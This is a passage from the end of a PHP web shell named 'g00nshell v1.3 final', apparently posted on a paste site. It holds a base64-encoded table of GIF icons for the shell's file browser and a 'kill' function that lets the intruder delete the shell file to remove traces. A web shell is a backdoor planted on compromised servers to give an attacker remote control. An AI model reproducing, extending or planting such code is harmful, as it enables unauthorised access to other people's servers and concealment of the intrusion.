  671.     "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
  672.     "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
  673.     "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
  674.     "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" .
  675.     "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" .
  676.     "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7",
  677.     "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
  678.     "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
  679.     "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" .
  680.     "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=",
  681.     "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
  682.     "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
  683.     "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" .
  684.     "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7",
  685.     "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
  686.     "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
  687.     "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" .
  688.     "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" .
  689.     "kUgXEQA7",
  690.     "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" .
  691.     "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" .
  692.     "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" .
  693.     "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" .
  694.     "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" .
  695.     "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" .
  696.     "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" .
  697.     "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" .
  698.     "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" .
  699.     "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" .
  700.     "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" .
  701.     "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" .
  702.     "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" .
  703.     "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" .
  704.     "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" .
  705.     "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7",
  706.     "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
  707.     "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" .
  708.     "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" .
  709.     "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnY***QLhBiJigsJADs=",
  710.     "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
  711.     "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
  712.     "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" .
  713.     "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs=");
  714.     header('Content-type: image/gif');
  715.     echo base64_decode($images[$img]);
  716.     die();
  717.     }
  718.      
  719.     function kill(){ // Shell deleter function
  720.     style();
  721.     echo("<form method='post'>");
  722.     echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' action='?act=kill'>");
  723.     echo("<input type='submit' value='Delete'>");
  724.     echo("</form>");
  725.     if($_POST['ver'] == "confirm"){
  726.     $self = basename($_SERVER['PHP_SELF']);
  727.     if(unlink($self)){echo("Deleted");}
  728.     else{echo("Failed");}
  729.     }
  730.     }
  731.     die();
  732.     ?>
  733.  
  734.  

Reply to "g00nshell v1.3 final"

Here you can reply to the paste above